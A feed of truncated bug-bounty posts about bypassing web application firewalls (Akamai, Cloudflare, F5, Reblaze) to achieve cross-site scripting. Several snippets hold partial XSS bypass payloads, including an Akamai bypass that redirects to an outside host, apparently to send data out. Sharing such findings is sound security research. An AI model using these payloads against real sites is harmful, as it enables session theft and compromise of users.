What about automatic AFB (Advanced Filter Bypass) when there's a WAF protecting your target page and some other improvements?
Stay tuned for the firs ...January 10, 2022
Yesterday, during a pentest, I managed to bypass the latest version of Reblaze WAF in order to get XSS ( It can't handle events like ondrag and not ev ...January 8, 2022
anyone in #BugBounty wanna help me bypass a WAF, I've got some basic post param html injection but wanna escalate to xss by bypassing the filters than ...December 25, 2021
WAF-bypass-xss-payloads
Trying to gather #xss payloads from the internet that #bypasses #WAF. All credit goes to the owners of the payloads.
https:// ...December 17, 2021
Looking for F5/Big-IP WAF bypass 👋
I need to escape a JavaScript tag to trigger an XSS but this f***** WAF block me and i'm out of ideas ...December 10, 2021
Look this tip about payloads:
Bounty:
Bugs: Information Disclosure and Cloudflare Bypass Reflected XSS
Bypass payloads:
<svg onload=prompt%26%230 ...December 2, 2021
🎯WAF bypass during exploitation of file upload :
WAF bypass discovered during exploitation of a file upload vulnerability.
#Google #bugbountytips ...November 15, 2021
Got extra bonus for XSS in JSON with WAF bypass on private @intigriti splitting my payload like this:
firstname : <img src='
lastname: 'onerror=pr ...October 4, 2021
Akamai XSS WAF bypass. Working in all browsers.
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stea ...September 28, 2021
Akamai XSS WAF bypass. Working in all browsers.
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stea ...September 27, 2021